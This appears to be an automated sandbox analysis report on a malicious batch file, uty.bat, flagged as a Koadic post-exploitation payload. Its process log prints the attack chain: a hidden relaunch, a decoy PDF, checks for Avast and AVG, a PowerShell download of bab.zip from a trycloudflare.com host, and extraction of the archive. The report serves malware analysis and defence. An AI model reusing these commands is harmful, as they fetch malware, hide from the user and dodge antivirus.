Source: 3.2.html.19.dr String found in binary or memory: https://peps.python.org/pep-3149/
Source: 3.4.html.19.dr String found in binary or memory: https://peps.python.org/pep-3154/
Source: 3.4.html.19.dr String found in binary or memory: https://peps.python.org/pep-3156/
Source: 3.2.html.19.dr String found in binary or memory: https://peps.python.org/pep-3333/
Source: versioncontrol.cpython-312.pyc.19.dr String found in binary or memory: https://pip.pypa.io/en/latest/reference/pip_freeze/#fixing-permission-denied.)
Source: 3.2.html.19.dr String found in binary or memory: https://rhettinger.wordpress.com/2011/01/28/open-your-source-more/
Source: 3.2.html.19.dr String found in binary or memory: https://svn.python.org
Source: controller.py.19.dr String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4.2
Source: sessions.py.19.dr String found in binary or memory: https://tools.ietf.org/html/rfc7231#section-6.4.4
Source: controller.py.19.dr String found in binary or memory: https://tools.ietf.org/html/rfc7234#section-4.1:
Source: controller.py.19.dr String found in binary or memory: https://tools.ietf.org/html/rfc7234#section-5.2
Source: 3.2.html.19.dr String found in binary or memory: https://unicode.org/versions/Unicode6.0.0/
Source: 3.2.html.19.dr String found in binary or memory: https://web.archive.org/web/20101208191259/https://www.activestate.com/activetcl/downloads
Source: 3.2.html.19.dr, 2.7.html.19.dr String found in binary or memory: https://web.archive.org/web/20200703234532/http://effbot.org/zone/elementtree-13-intro.htm
Source: 3.2.html.19.dr String found in binary or memory: https://wiki.python.org/moin/HowTo/Sorting/
Source: 3.2.html.19.dr String found in binary or memory: https://www.mercurial-scm.org/
Source: 3.2.html.19.dr String found in binary or memory: https://www.mercurial-scm.org/guide
Source: 3.2.html.19.dr String found in binary or memory: https://www.mercurial-scm.org/wiki/QuickStart
Source: 3.2.html.19.dr String found in binary or memory: https://www.openssl.org/docs/man1.0.2/man1/ciphers.html#CIPHER-LIST-FORMAT
Source: 3.0.html.19.dr, import.html0.19.dr, capsule.html.19.dr, datastructures.html.19.dr, genindex-I.html.19.dr, grammar.html.19.dr, genindex-D.html.19.dr, expressions.html.19.dr, urllib.html.19.dr, method.html.19.dr, 3.1.html.19.dr, datamodel.html.19.dr, traceback.html.19.dr, search.html.19.dr, download.html.19.dr, floatingpoint.html.19.dr, xmlrpc.client.html.19.dr, 2.7.html.19.dr, genindex-F.html.19.dr, index.html2.19.dr, newtypes_tutorial.html.19.dr String found in binary or memory: https://www.python.org/
Source: 3.2.html.19.dr String found in binary or memory: https://www.python.org/download/mac/tcltk/
Source: classes.html.19.dr, datamodel.html.19.dr String found in binary or memory: https://www.python.org/download/releases/2.3/mro/
Source: index.html5.19.dr, uuid.html.19.dr, introduction.html0.19.dr, genindex-T.html.19.dr, arg.html.19.dr, genindex-E.html.19.dr, coro.html.19.dr, 3.4.html.19.dr, weakref.html0.19.dr, classes.html.19.dr, 3.2.html.19.dr, genindex-B.html.19.dr, windows.html2.19.dr, genindex-P.html.19.dr, token.html.19.dr, genindex-_.html.19.dr, xml.sax.reader.html.19.dr, contents.html.19.dr, dict.html.19.dr, 3.0.html.19.dr, import.html0.19.dr String found in binary or memory: https://www.python.org/psf/donations/
Source: index.html5.19.dr, uuid.html.19.dr, introduction.html0.19.dr, genindex-T.html.19.dr, arg.html.19.dr, genindex-E.html.19.dr, coro.html.19.dr, 3.4.html.19.dr, weakref.html0.19.dr, classes.html.19.dr, 3.2.html.19.dr, genindex-B.html.19.dr, windows.html2.19.dr, genindex-P.html.19.dr, token.html.19.dr, genindex-_.html.19.dr, xml.sax.reader.html.19.dr, contents.html.19.dr, dict.html.19.dr, 3.0.html.19.dr, import.html0.19.dr String found in binary or memory: https://www.sphinx-doc.org/
Source: 3.4.html.19.dr String found in binary or memory: https://www.sqlite.org/uri.html
Source: 3.2.html.19.dr String found in binary or memory: https://www.unicode.org/versions/Unicode6.0.0/#Database_Changes
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.5:49687 version: TLS 1.2

System Summary

barindex
Source: uty.bat, type: SAMPLE Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: uty.bat, type: SAMPLE Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engine Classification label: mal72.phis.winBAT@38/1071@1/1
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.2576 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sabhyszv.ehm.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uty.bat" "
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: uty.bat Virustotal: Detection: 14%
Source: uty.bat ReversingLabs: Detection: 20%
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\uty.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\uty.bat\" hidden' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\uty.bat" hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1584,i,165502249447602555,9078329850014481048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process cmd -ArgumentList '/c \"C:\Users\user\Desktop\uty.bat\" hidden' -WindowStyle Hidden" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\Desktop\uty.bat" hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "AvastUI.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /i "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://bernard-criterion-consultant-url.trycloudflare.com/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1584,i,165502249447602555,9078329850014481048,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
